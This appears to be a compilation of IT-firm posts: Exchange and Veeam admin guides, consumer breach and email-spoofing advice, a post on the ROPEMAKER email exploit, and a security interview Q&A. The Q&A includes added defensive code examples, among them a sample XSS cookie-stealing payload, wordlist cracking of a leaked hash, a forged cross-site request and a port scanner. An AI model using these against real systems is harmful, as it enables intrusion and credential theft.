Mike Hendrickson


  • 11/5/2013 added a section on firewall rules to try.
  • 7/17/2014 added a section on running as a scheduled task.
  • 3/28/2016 Version 2.0:
    • Instead of running Get-Counter -ComputerName to remotely access Perfmon counters, the script now uses PowerShell Remoting, specifically Invoke-Command -ComputerName, so that all counter collection is done locally on each target server. This significantly speeds up the collection duration.
    • The script now supports using the -Verbose switch to provide information during script execution.
    • Per Thomas Stensitzki's script variation, added functionality so that DateTimes can be properly parsed on non-English (US) computers.
    • Added functionality to generate a database heat map based on log usage.
  • 6/22/2016 Version 2.1:
    • When run in -Gather mode, the script now uses Test-WSMan against each target computer to verify Remote PowerShell connectivity prior to doing the log collection.
    • Added new column to log analysis files, PercentDailyUsageForCalc, which allows for direct copy/paste into the Exchange Server Role Requirements Calculator. Additionally, the script will try to ensure that all rows in the column add up to exactly 1 (requires samples from all 24 hours of the day).
    • Significantly increased performance of analysis operations.



Veeam - Data Recovery

Data Recovery

Veeam Backup & Replication offers a number of recovery options for various disaster recovery scenarios:

  • Instant VM Recovery enables you to instantly start a VM directly from a backup file
  • Entire VM recovery enables you to recover a VM from a backup file to its original or another location
  • VM files restore enables you to recover separate VM files (virtual disks, configuration files and so on)
  • Guest OS File Recovery enables you to recover individual guest OS files from Windows, Linux, Mac and other guest OS file systems.

Veeam Backup & Replication uses the same image-level backup for all data recovery operations. You can restore VMs, VM files and individual guest OS files to the most recent state or to any available restore point.

To view and recover Microsoft Active Directory, Microsoft SQL Server, Microsoft SharePoint, Microsoft Exchange or Oracle application items, you can use the capabilities of Veeam Backup Explorers. For more information, see Veeam Backup Explorers User Guide.



Veeam - Create a Backup Job Guide

Creating Backup Jobs

To back up VMs, you must configure a backup job. The backup job defines how, where and when to back up VM data. One job can be used to process one or more VMs.

You can configure a backup job and start it immediately or save the job and run it later. Jobs can be started manually or scheduled to run automatically at a specific time.

Before creating a backup job, check prerequisites. Then use the New Backup Job wizard to configure the backup job.

  1. Launch the New Backup Job wizard
  2. Specify job name and description
  3. Select VMs to back up
  4. Exclude objects from the backup job
  5. Define VM backup order
  6. Specify backup storage settings
  7. Specify advanced backup settings
  8. Specify secondary target
  9. Specify guest processing settings
  10. Define the job schedule
  11. Finish working with the wizard



Veeam Email Configuration - Guide

Configuring Global Email Notification Settings

To configure global email notification settings:

  1. From the main menu, select General Options.
  2. Open the E-mail Settings tab.
  3. Select the Enable e-mail notifications check box.
  4. In the SMTP server field, enter the full DNS name or IP address of the SMTP server that will be used for sending email notifications.
  5. Click the Advanced button to specify user credentials and connection options:
     a. Specify the port number and connection timeout for the SMTP server.
     b. To use a secure connection for email operations, select the Connect using SSL check box. Prefer this whenever the SMTP server supports it, so that the credentials and the notification content (which names your backup jobs and servers) are not sent in clear text.
     c. If you need to connect to the SMTP server using a specific account, select the This SMTP server requires authentication check box and select the necessary credentials from the Log on as list. If you have not set up credentials beforehand, click the Manage accounts link or click Add on the right to add credentials. Use a dedicated mailbox with send-only rights for this, since the credentials are stored on the backup server. For more information, see Managing Credentials.
  6. In the From field, specify the email address from which notifications must be sent.
  7. In the To field, specify the recipient address(es). Use a semicolon to separate multiple addresses. Recipient(s) specified in this field will receive a notification about every job managed by the backup server. You can leave the field empty if required. For every particular job, you can specify additional recipients; for more information, see Configuring Job Notification Settings.
  8. In the Subject field, specify a subject for the sent message. You can use the following variables in the subject:
     • %Time% — completion time
     • %JobName%
     • %JobResult%
     • %VmCount% — number of VMs in the job
     • %Issues% — number of VMs in the job that have been processed with the Warning or Failed status
  9. Select the Notify on success, Notify on warning and/or Notify on failure check boxes to receive an email notification when a job completes successfully, with a warning or with a failure.
  10. Select the Suppress notifications until the last retry check box to receive a single notification about the final job status. If you do not enable this option, Veeam Backup & Replication sends one notification per job retry.
  11. To check that all settings have been configured correctly, click Test Message to send a test email.




Checking to see if you have been hacked

Data breaches are becoming all too common these days, with the latest affecting 150 million users of calorie-counting app MyFitnessPal.

Don't worry if your account has been hacked: take a deep breath and follow this simple guide.

Help is at hand.

You can check whether you've been hacked, often called being "pwned", and bolster your account security by following these simple steps.

What is Have I Been Pwned?

The most popular site for checking if your email address, and other accounts tied to it, has been hacked is Have I Been Pwned.

Here you can safely enter your email address and the site will check it against multiple data breach incidents.


If you're worried your email account has been hacked, your first port of call should be the Have I Been Pwned website.

If your account details were included in one of those breaches, the site will tell you with the message "oh no – pwned" flashing up on screen.

It will also give you information on the breach and the type of data that was compromised, such as email addresses and passwords, and which service it was linked to.

The site only asks for your email address, so you don't need to worry about handing over passwords and other sensitive info.

Just enter your email into the search bar, and click the "pwned?" button next to it.

The results will then appear on the corresponding page.

Always set a unique password for your email, and make sure you don't repeat it anywhere else

What should I do if my account has been pwned?

If you're met with bad news, your first move should be to change the password on the service that was breached.

Then change it on every other account where you used the same password, starting with your email account, and turn on two-factor authentication wherever it is offered.

Even if your email itself hasn't been the victim of a breach, it is at risk if another account you log into with the same password has been: attackers take leaked email/password pairs and try them on other services (credential stuffing).

In an ideal world, we'd use a different password for every platform we sign up to.

But with apps and social networks piling up, it's easy to fall back on the same login to avoid confusion; a password manager removes that excuse.

At the very least, you should have a strong, unique password for logging into your email, since whoever controls your email can reset the passwords on everything else.


Contact IDSS to help !


Thank you, 

Emails are Sending FROM Me, but it isn't me! Help

John Doe is “getting returns of emails I didn’t send… How do I prevent this?”

What’s worse than getting spam? Unwittingly sending it. When bogus and probably malware-laden advertising goes out in your name, you look bad. And you get flooded with bounced messages from dead addresses that some crook attempted to spam in your name.

The good news: You’re not sending out spam. Neither is your computer or your IP address. But the bad news can still be pretty bad.

If spam is going out from your email address, the address has been either spoofed or hijacked. Either way, the spam isn’t going out from your computer, and probably not from the criminal’s computer either. It’s probably going out from an unknowing victim’s malware-infected PC that has your contact information saved on it.

Spoofing an email address is, in a sense, forging it. The criminal sends out mail with your FROM address, even though they have no access to your account.

There’s little the individual user can do about spoofing: the criminal never touches your account, only the From line. The real fix sits with whoever owns the domain, who can publish SPF, DKIM and DMARC records so that receiving mail servers can recognise and reject mail that claims to come from the domain but was sent from elsewhere. Fortunately, for their own reasons, cybercrooks tend to change spoofed addresses frequently, so the flood of bounces usually stops on its own.
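Spoofing of the From address is something the domain owner, not the user, can counter. As an added example, not part of the original article: a minimal evaluator for the ip4/ip6/all mechanisms of an SPF record, the DNS TXT record a domain publishes to list which hosts may send mail as that domain, which the receiving mail server checks against the connecting IP. The records, domains and addresses below are constructed; no DNS lookup is made, and the mechanisms that require one (a, mx, include, redirect) are not implemented.

```python
import ipaddress

# Constructed DNS data for hypothetical domains (no lookups are made): the TXT
# records their owners would publish to list the hosts allowed to send as them.
SPF_RECORDS = {
    "example.test": "v=spf1 ip4:203.0.113.0/24 ip6:2001:db8:1::/48 -all",
    "softfail.test": "v=spf1 ip4:192.0.2.0/24 ~all",
}
RESULT_FOR_QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(mail_from_domain, connecting_ip, records=SPF_RECORDS):
    """Evaluate the ip4/ip6/all mechanisms of an SPF record for the sending host,
    the check a receiving server runs on the envelope-from domain.
    Returns one of: none, pass, fail, softfail, neutral."""
    record = records.get(mail_from_domain)
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"            # no policy published: a forged From is undetectable
    sender = ipaddress.ip_address(connecting_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            return RESULT_FOR_QUALIFIER[qualifier]
        mechanism, _, value = term.partition(":")
        if mechanism.lower() in ("ip4", "ip6"):
            network = ipaddress.ip_network(value, strict=False)
            if sender.version == network.version and sender in network:
                return RESULT_FOR_QUALIFIER[qualifier]
        # a, mx, include and redirect need DNS queries and are out of scope here.
    return "neutral"             # record exhausted without a match


def accept_mail(mail_from_domain, connecting_ip, records=SPF_RECORDS):
    """The receiver's policy: reject a hard fail, accept but flag a soft fail.
    Returns (action, spf_result)."""
    result = check_spf(mail_from_domain, connecting_ip, records)
    if result == "fail":
        return ("reject", result)
    if result == "softfail":
        return ("accept-flagged", result)
    return ("accept", result)


if __name__ == "__main__":
    for domain, ip in [("example.test", "203.0.113.5"), ("example.test", "198.51.100.7"),
                       ("softfail.test", "198.51.100.7"), ("nopolicy.test", "198.51.100.7")]:
        print(domain, ip, accept_mail(domain, ip))
```

A "-all" record lets the receiver reject the forged message outright, so the bounces never reach the spoofed user; DMARC additionally ties this result to the From header the user actually sees and tells receivers what to do with failures.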

Hijacking is worse. In this case, the criminal takes control of your account. They can read your mail, and they can target people you know when they spam. And they can lock you out of your own account.

Fortunately, you can do something about hijacking.

As soon as you discover that your address is spamming people, try to change your password…immediately. If you succeed, you’ve fixed the problem.

But if your mail service rejects your password, the problem is serious. The hijacker has changed the password first and now controls your account.

If you’re still connected and can receive mail, try to log in on another computer or in your browser’s private mode. When the login fails, use the service’s “Forgot your password” or “Need help” link: the service will send a reset link or code to your recovery address or phone. Hopefully you’ll get it before the bad guy does.

If that fails, you’ll have to contact the mail service and discuss the problem. Here are the links for Gmail and Microsoft’s Outlook. If you’re using another service, you’ll have to find the right address yourself.

Have you been using the same password for other services? If so, change them as soon as possible.

Once you’ve got everything under control, email apologies to everyone who received, or might have received, spam apparently coming from you.

Finally, follow these steps to make sure this doesn’t happen again:

  • Use strong, long passwords that people can’t guess.
  • Use different passwords for different services, and keep track of them with a password manager.
  • Set up 2-step verification for your service. You should find instructions on the service’s setup or options screen.
  • Never email your password to anyone, and I mean anyone.

You will also need additional email security scans and consulting to ensure the email server itself is not compromised. Every IT consultant does their best to secure your servers, but you need multiple layers of protection; contact us at IDSS for assistance.


Contact IDSS to help




Most people live under the assumption that email is immutable once delivered, like a physical letter.  A new email exploit, dubbed ROPEMAKER by Mimecast’s research team, turns that assumption on its head, undermining the security and non-repudiation of email, even for those who use S/MIME or PGP for signing.  Using the ROPEMAKER exploit a malicious actor can change the displayed content in an email at will. For example, a malicious actor could swap a benign URL with a malicious one in an email already delivered to your inbox, turn simple text into a malicious URL, or edit any text in the body of an email whenever they want. All of this can be done without direct access to the inbox.

Described in more detail in a recently published security advisory, Mimecast has been able to add a defense against this exploit for our customers and also provide security recommendations that can be considered by non-customers to safeguard their email from this email exploit.

So what is ROPEMAKER?

The origin of ROPEMAKER lies at the intersection of email and Web technologies, more specifically Cascading Style Sheets (CSS) used with HTML.  While the use of these Web technologies has made email more visually attractive and dynamic relative to its purely text-based predecessor, it has also introduced an exploitable attack vector for email.

Clearly, giving attackers remote control over any aspect of one’s applications or infrastructure is a bad thing.  As is described in more depth in the ROPEMAKER Security Advisory, this remote-control ability could enable bad actors to direct unwitting users to malicious Web sites or cause other harmful consequences using a technique that could bypass common security controls and fool even the most security-savvy users.  ROPEMAKER could be leveraged in ways that are limited only by the creativity of the threat actors, which experience tells us is often unlimited.

[Figures: the same delivered email shown before and after its displayed content is changed post-delivery, without direct access to the user’s desktop.]

To date, Mimecast has not seen ROPEMAKER exploited in the wild.  We have, however, shown it to work on most popular email clients and online email services.  Given that Mimecast currently serves more than 27K organizations and relays billions of emails monthly, if these types of exploits were being widely used it is very likely that Mimecast would see them.  However, this is no guarantee that cybercriminals aren’t currently taking advantage of ROPEMAKER in very targeted attacks.

For details on email clients that we tested that are and are not exploitable by ROPEMAKER and the specifics on a security setting recommended by Apple for Apple Mail, please see the ROPEMAKER Security Advisory.

Is ROPEMAKER a software vulnerability, a form of potential application abuse/exploit, or a fundamental design flaw resulting from the intersection of Web technologies and email?  Does it really matter which it is? For sure attackers don’t care why a system can be exploited, only that it can be. If you agree that the potential of an email being changeable post-delivery under the control of a malicious actor increases the probability of a successful email-borne attack, the issue simplifies itself.  Experience tells us that cybercriminals are always looking for the next email attack technique to use.  As an industry let’s work together to reduce the likelihood that the ROPEMAKER style of exploits gains any traction with cybercriminals!
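The only way a message's appearance can depend on something outside the message is CSS that the mail client fetches from the network when it renders, which is the channel ROPEMAKER uses. As an added example, not Mimecast's code and not from the advisory: a gateway-side check that lists every remote CSS reference in an HTML body (stylesheet links, @import rules, url() references) and a rewrite that strips them so the message is frozen at delivery. The sample message and its hosts are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a delivered HTML message (hypothetical hosts). Its
# presentation depends on CSS fetched from a server the sender still controls,
# so what the recipient sees can be changed after delivery.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://css.example.test/switch.css">
<style>
@import url("http://css.example.test/matrix.css");
p { color: black; }
</style>
</head><body>
<p style="background: url('http://css.example.test/track.png')">
<a href="http://safe.example.test/">Safe link</a></p>
</body></html>"""

# Ways CSS text can reach out to the network.
IMPORT_STATEMENT = re.compile(r"@import\b[^;]*;?", re.I)
IMPORT_URL = re.compile(r"""@import\s+(?:url\(\s*)?['"]?(https?://[^'"\s;)]+)""", re.I)
URL_FUNC = re.compile(r"""url\(\s*['"]?(https?://[^'"\s)]+)""", re.I)
LINK_STYLESHEET = re.compile(r"""<link\b[^>]*\brel\s*=\s*['"]?stylesheet['"]?[^>]*>""", re.I)
REMOTE_URL_FUNC = re.compile(r"""url\(\s*['"]?https?://[^)]*\)""", re.I)


class RemoteCssFinder(HTMLParser):
    """Collect every point where rendering the message would fetch CSS, or a
    CSS-referenced resource, from the network."""

    def __init__(self):
        super().__init__()
        self.remote_refs = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        a = {name.lower(): (value or "") for name, value in attrs}
        if tag == "link" and "stylesheet" in a.get("rel", "").lower().split():
            if a.get("href", "").lower().startswith(("http://", "https://")):
                self.remote_refs.append(("link", a["href"]))
        elif tag == "style":
            self._in_style = True
        for url in URL_FUNC.findall(a.get("style", "")):
            self.remote_refs.append(("style-attr", url))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # HTMLParser passes <style> content through untouched, so the CSS can be scanned.
        if self._in_style:
            for url in IMPORT_URL.findall(data):
                self.remote_refs.append(("import", url))
            for url in URL_FUNC.findall(IMPORT_STATEMENT.sub("", data)):
                self.remote_refs.append(("style-url", url))


def find_remote_css(html_body):
    """Return [(kind, url), ...] for every remote CSS reference in the message."""
    finder = RemoteCssFinder()
    finder.feed(html_body)
    finder.close()
    return finder.remote_refs


def strip_remote_css(html_body):
    """Freeze the message at delivery: remove external stylesheet links, @import
    rules and remote url() references. Email has no legitimate need for a
    stylesheet fetched at read time, so nothing of value is lost."""
    html_body = LINK_STYLESHEET.sub("", html_body)
    html_body = IMPORT_STATEMENT.sub("", html_body)
    html_body = REMOTE_URL_FUNC.sub("none", html_body)
    return html_body


if __name__ == "__main__":
    for kind, url in find_remote_css(SAMPLE_HTML):
        print(f"remote CSS via {kind}: {url}")
    print("after stripping:", find_remote_css(strip_remote_css(SAMPLE_HTML)))
```

Flagging rather than silently rewriting is the safer first step for a gateway; the same scan also applies to a client-side setting that disables remote content, which achieves the freeze without modifying the message.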



Cyber Security Interview Q&A

Top 50 Cyber Security Interview Questions and Answers 

The interview process is tough, not only for the candidates but also for the interviewers. The process also depends on the position being hired for. For a replacement, the skills of the previous employee are taken as the benchmark; when a team is being expanded, management knows the skills it expects from candidates. The interview process is tough because:

  • Not many experienced professionals are willing to change jobs

  • Interviewers' expectations of candidates are always high

  • The right candidates don't fit within the budget cap.

Interviewers are usually interested in candidates who have the necessary domain and technical knowledge, unless they are hiring for a particular skill, e.g. exploit development.

The Interview Process

  • Resume shortlisting

  • Basic HR questions

  • Interview level 1 (Tech)

  • Interview level 2 (Tech + Attitude)

Once the resume is shortlisted, a basic HR call follows. This confirms that the resume is up to date and that you are actually looking for a change, and sometimes covers a basic set of questions about your experience and reasons for changing. The call will also tell you whether your resume has been sent on for the next level of review. The next level can be a telephone call, a face-to-face interview or a call over Skype. Level 1 will actually test your knowledge, whereas level 2 will look at your experience and attitude towards work. So be prepared with the basics of information security, your technical knowledge and a thorough command of your own resume, along with a positive attitude.

Different levels - Cyber Security Interview Questions & Answers

  • Level 01 - Basic Questions

  • Level 02 - Learners (Experienced but still learning)

  • Level 03 - Master (Entered into a managerial position or sitting for one)

  • Level 04 - Grandmaster (Senior management roles)

Level 01 - Basic questions (Not to be messed up)

1. Explain risk, vulnerability and threat?
TIP: A good way to start this answer is by explaining vulnerability, and threat and then risk. Back this up with an easy to understand example.

A vulnerability is a weakness in a system's protection (a missing patch, a default credential, an unvalidated input). A threat is anything that can exploit that weakness, for example an attacker or a piece of malware. Risk is the potential loss that results when a threat exploits a vulnerability, usually judged by likelihood and impact. Example: a server still using its default username and password (vulnerability); an attacker who logs in with them (threat); the compromise of the server and the data on it (risk).

2. What is the difference between Asymmetric and Symmetric encryption and which one is better?
TIP: Keep the answer simple as this is a vast topic.

Symmetric encryption uses the same key for encryption and decryption; asymmetric encryption uses a key pair, a public key for encryption and a private key for decryption.

Symmetric algorithms are much faster, but both parties must already share the secret key, which has to be distributed over a channel the attacker cannot read (the key distribution problem).

Asymmetric encryption solves key distribution, since the public key can be published openly, but it is far slower and limited to small messages. Neither is "better" on its own; in practice a hybrid is used: asymmetric encryption (or key agreement) to establish a session key, then symmetric encryption of the data with that key. This is how TLS works.

3. What is an IPS and how does it differs from IDS?

An IDS (intrusion detection system) detects suspicious traffic and raises an alert, leaving the response to the administrator; an IPS (intrusion prevention system) detects it and also blocks it. The other difference is placement: an IDS sits out of band, on a SPAN/mirror port or tap, and sees a copy of the traffic, so it cannot stop anything; an IPS sits inline in the traffic path, so it can drop packets, but a bad signature or a failure of the device itself can then block legitimate traffic. Both work from the same signatures and anomaly rules.

4. What is XSS, how will you mitigate it?

Cross-site scripting is an injection vulnerability in web applications: untrusted input is written into a page without being validated or encoded, so attacker-supplied script runs in other users' browsers with their session. The simplest case is a comment field whose content is stored and later rendered as-is (stored XSS); the same happens when a request parameter is echoed straight back (reflected XSS) or when client-side script writes untrusted data into the DOM (DOM-based XSS).

Countermeasures are context-aware output encoding (the HTML, attribute, JavaScript and URL contexts each need their own), input validation, a Content Security Policy (CSP) to block inline and foreign scripts, and HttpOnly cookies so that a successful injection cannot read the session cookie.

TIP: Know the different types of XSS and how the countermeasures work.
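As an added example, not from the original page: the same comment-rendering code written the vulnerable way and with the countermeasures above, plus the URL-context case that encoding alone does not cover. The attacker input is constructed and security_headers is a hypothetical helper standing in for whatever the framework uses to set response headers.

```python
import html
from urllib.parse import urlparse

# Constructed attacker input: a comment that carries script through an event
# handler, the classic stored/reflected XSS payload.
ATTACKER_COMMENT = '<img src=x onerror="alert(document.cookie)">'


def render_comment_vulnerable(author, comment):
    """Untrusted data concatenated straight into HTML: the browser executes it."""
    return f"<p><b>{author}</b>: {comment}</p>"


def render_comment_safe(author, comment):
    """Output encoding for the HTML text context turns the markup into inert text."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(comment)}</p>"


def safe_href(user_url):
    """URL context needs more than encoding: a javascript: or data: URL survives
    html.escape untouched, so allow only http(s) and then encode for the attribute."""
    candidate = user_url.strip()
    if urlparse(candidate).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(candidate, quote=True)


def render_profile_link(user_url, label):
    """Attribute context plus text context, each encoded for where it lands."""
    return f'<a href="{safe_href(user_url)}">{html.escape(label)}</a>'


def security_headers():
    """Defence in depth for whatever the encoding misses (hypothetical helper):
    CSP refuses inline script and foreign script hosts, HttpOnly keeps the
    session cookie out of reach of any script that does run."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
        "Set-Cookie": "session=<id>; HttpOnly; Secure; SameSite=Lax",
    }


if __name__ == "__main__":
    print(render_comment_vulnerable("bob", ATTACKER_COMMENT))
    print(render_comment_safe("bob", ATTACKER_COMMENT))
    print(render_profile_link("javascript:alert(1)", "my site"))
```

Note that the encoding is applied at output, per context, rather than by "cleaning" the input: the same stored comment may later be rendered into HTML, into a JSON response and into a URL, and each of those needs a different transformation.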

5. What is the difference between encryption and hashing?
TIP: Keep the answer short and straight.

Point 1: Encryption is reversible (with the key) whereas hashing is one-way. A hash cannot be reversed, but a hash of a guessable input can be recovered by hashing guesses, which is what rainbow tables and brute-force cracking do; salting and a deliberately slow hash (bcrypt, scrypt, PBKDF2) defend against this. Collision attacks are a separate weakness, where two different inputs produce the same hash, as with MD5 and SHA-1.

Point 2: Encryption ensures confidentiality whereas hashing ensures Integrity.
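The hashing half of this distinction, as an added example that is not from the original page: a fast unsalted hash recovered from a wordlist, the salted slow hash that prevents that, and a keyed hash (HMAC) used for the integrity purpose in point 2. The wordlist, password, digest and key are constructed; the encryption half needs a cipher library and is not shown.

```python
import hashlib
import hmac
import os

# Constructed "leaked" data: a tiny wordlist and the unsalted SHA-256 of a weak
# password, standing in for a dumped credential table.
WORDLIST = ["123456", "password", "letmein", "Summer2018", "qwerty"]
LEAKED_SHA256 = hashlib.sha256(b"Summer2018").hexdigest()


def crack_fast_hash(digest_hex, wordlist):
    """A hash is not reversible, but a fast unsalted hash of a guessable input is
    recovered by hashing guesses until one matches (a rainbow table is just this
    work done in advance). Returns the recovered input or None."""
    for guess in wordlist:
        if hashlib.sha256(guess.encode()).hexdigest() == digest_hex:
            return guess
    return None


def hash_password(password, salt=None, iterations=100_000):
    """Salted, slow hash for password storage: the random salt makes precomputed
    tables useless (every user's hash differs even for the same password) and the
    iteration count makes each guess expensive. Returns a self-describing string."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and parameters; compare in constant time."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def integrity_tag(key, message):
    """Hashing for integrity: a keyed hash (HMAC) over the message. Without the
    key, a modified message cannot be given a matching tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def tag_valid(key, message, tag):
    return hmac.compare_digest(integrity_tag(key, message), tag)


if __name__ == "__main__":
    print("recovered:", crack_fast_hash(LEAKED_SHA256, WORDLIST))
    stored = hash_password("Summer2018")
    print("stored:", stored)
    print("verify:", verify_password("Summer2018", stored), verify_password("Summer2019", stored))
```

The stored string carries the algorithm, iteration count and salt alongside the digest, so the iteration count can be raised later without invalidating existing records; none of this is encryption, since nothing in the record lets anyone get the password back.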

6. Are you a coder/developer or know any coding languages?
TIP: You are not expected to be a PRO; understanding of the language will do the job.

Although an information security professional is not expected to be a developer, knowledge of HTML, JavaScript and Python is a great advantage. HTML and JavaScript are what web application attacks are written in, whereas Python is used to automate tasks, write tooling and develop exploits. A little knowledge of all three helps both in the interview and on the job.

7. What is CSRF?

Cross-site request forgery is a web application vulnerability in which the server cannot tell whether a request was intended by the user or triggered by another site. The attacker's page makes the victim's browser send a request (a form post, an image load) to the vulnerable site, and the browser attaches the victim's cookies, so the server processes it as the user. Countermeasures are anti-CSRF tokens tied to the session, the SameSite cookie attribute, and checking the Origin or Referer header; the usual way to detect the flaw is to check whether state-changing requests still succeed with the token removed.
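As an added example, not from the original page: a state-changing endpoint protected by a session-bound synchronizer token and an Origin check, exercised with a request from the site's own page and with the same request as an attacker's page would make the browser send it. The application origin, session id and request objects are constructed stand-ins for a web framework's request.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SITE_ORIGIN = "https://bank.example.test"      # hypothetical application origin
SERVER_SECRET = secrets.token_bytes(32)        # per-deployment secret, generated here


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: HMAC(secret, session id). The
    attacker's page cannot read it (same-origin policy), so cannot forge it, and
    the server need not store it because it can recompute it."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, presented, secret=SERVER_SECRET):
    expected = issue_csrf_token(session_id, secret)
    return hmac.compare_digest(expected, presented or "")


def origin_allowed(headers):
    """Second, independent check: the browser sets Origin (or Referer) on
    cross-site requests and page script cannot override it. A request carrying
    neither header is refused rather than assumed to be same-site."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlparse(source)
    return f"{parts.scheme}://{parts.netloc}".lower() == SITE_ORIGIN


def handle_transfer(request):
    """A state-changing endpoint. `request` is a constructed stand-in for a
    framework request: a dict with 'cookies', 'headers' and 'form'.
    (Setting the session cookie with SameSite=Lax or Strict would stop the
    browser attaching it to cross-site POSTs in the first place.)"""
    session_id = request["cookies"].get("session")
    if not session_id:
        return 401
    if not origin_allowed(request["headers"]):
        return 403
    if not csrf_token_valid(session_id, request["form"].get("csrf_token")):
        return 403
    # ... perform the transfer for the authenticated user ...
    return 200


def legitimate_request(session_id="sess-7f3a"):
    """Form submitted from the site's own page: token present, Origin is ours."""
    return {
        "cookies": {"session": session_id},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"to": "acct-42", "amount": "100",
                 "csrf_token": issue_csrf_token(session_id)},
    }


def forged_request(session_id="sess-7f3a"):
    """Auto-submitted form on an attacker page: the browser attaches the victim's
    cookie anyway, but cannot supply the token or fake the Origin."""
    return {
        "cookies": {"session": session_id},
        "headers": {"Origin": "https://evil.example.test"},
        "form": {"to": "acct-attacker", "amount": "100"},
    }


if __name__ == "__main__":
    print("legitimate:", handle_transfer(legitimate_request()))   # 200
    print("forged:    ", handle_transfer(forged_request()))       # 403
```

Both checks are kept because each covers a gap in the other: the Origin header can be absent in some configurations, and a token alone does nothing for an endpoint a developer forgot to protect, whereas a blanket Origin check at the framework level catches those too.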

8. What is a Security Misconfiguration?

Security misconfiguration is a vulnerability in which a device, application or network is configured in a way an attacker can exploit. This can be as simple as leaving the default username and password unchanged, using a weak password on a device account, or leaving an unnecessary service or debug feature enabled.

9. What is a Black hat, white hat and Grey hat hacker?
TIP: Keep the answer simple.

Black hat hackers attack systems without authorisation. White hat hackers are authorised to test, under a contract that defines the scope and rules of engagement. Grey hat hackers sit in between: they may have good intentions but sometimes act without authorisation, for example probing a system they were never asked to test and then reporting the flaw.

10. What is a firewall?
TIP: Be simple with the answer, as this can get complex and lead to looped questions.

A firewall is a device that allows/blocks traffic as per defined set of rules. These are placed on the boundary of trusted and untrusted networks.

11. How do you keep yourself updated with the information security news?
TIP: Just in case you haven't followed any: The Hacker News, Threatpost, Pentest Magazine etc.

Be sure to check and follow a few security forums so that you get regular updates on what is happening in the market and about the latest trends and incidents.

12. The world has recently been hit by ……. Attack/virus etc. What have you done to protect your organisation as a security professional?

Different organisations work in different ways, and the way an incident is handled differs from one to the next; some take this seriously and some do not. The answer should be the process you follow to handle an incident. Align it with one you have actually handled and go on from there; just don't exaggerate.

13. CIA triangle?

  • Confidentiality: Keeping the information secret.

  • Integrity: Keeping the information unaltered.

  • Availability: Information is available to the authorised parties at all times.

14. HIDS vs NIDS and which one is better and why?

HIDS is a host-based intrusion detection system and NIDS is a network-based one. Both work along similar lines; the difference is placement and visibility. A HIDS runs on each host and sees processes, file changes and local logs, at the cost of an agent to manage on every machine and some of the host's processing power; a NIDS sits at a network choke point and sees traffic between many hosts, but not what happens inside them or inside encrypted sessions. Neither is strictly better: an enterprise normally deploys a NIDS for broad coverage and adds a HIDS on critical servers.


Level 02 - Learners (Experienced but still learning)

15. What is port scanning?

Port scanning is the process of sending packets to a range of ports on a target and analysing the responses, in order to learn which ports are open, which services are listening and, by inference, what operating system is running. A TCP connect or SYN scan, for example, classifies a port as open (the handshake is answered), closed (an RST comes back) or filtered (no reply, usually a firewall dropping the probe).
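As an added example, not from the original page: a TCP connect scan that classifies ports as open, closed or filtered from the reply to connect(), run in parallel the way scanners do. So that it runs offline, the target is constructed: a throwaway listener on the loopback address provides a known-open port and a port that was bound and released provides a known-closed one.

```python
import errno
import socket
from concurrent.futures import ThreadPoolExecutor

# "Connection refused" is how the OS reports the RST a closed port sends back.
REFUSED = {errno.ECONNREFUSED, getattr(errno, "WSAECONNREFUSED", errno.ECONNREFUSED)}


def scan_port(host, port, timeout=0.5):
    """TCP connect scan of one port. connect() sends a SYN; the reply classifies it:
    open     - handshake completed (a service is listening)
    closed   - RST came back (host reachable, nothing listening)
    filtered - no reply before the timeout (typically a firewall dropping the SYN)"""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            err = sock.connect_ex((host, port))
        except OSError:
            return "filtered"
    if err == 0:
        return "open"
    if err in REFUSED:
        return "closed"
    return "filtered"


def scan(host, ports, timeout=0.5, workers=32):
    """Scan many ports concurrently and return {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: scan_port(host, p, timeout), ports))
    return dict(zip(ports, states))


def local_demo():
    """Constructed target on 127.0.0.1 only: a listening socket on an ephemeral
    port (the kernel completes the handshake even though accept() is never
    called) and a port that was bound and then released, so nothing listens on it.
    Returns (results, open_port, closed_port)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()

    try:
        results = scan("127.0.0.1", [open_port, closed_port])
    finally:
        listener.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, open_port, closed_port = local_demo()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1:{port} {state}")
```

A connect scan completes the handshake and therefore shows up in the target's application logs; a SYN scan stops after the SYN/ACK and needs raw sockets and elevated privileges, which is why tools such as nmap default to it when run as root. Scan only hosts you are authorised to test.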

16. What is the difference between VA and PT?
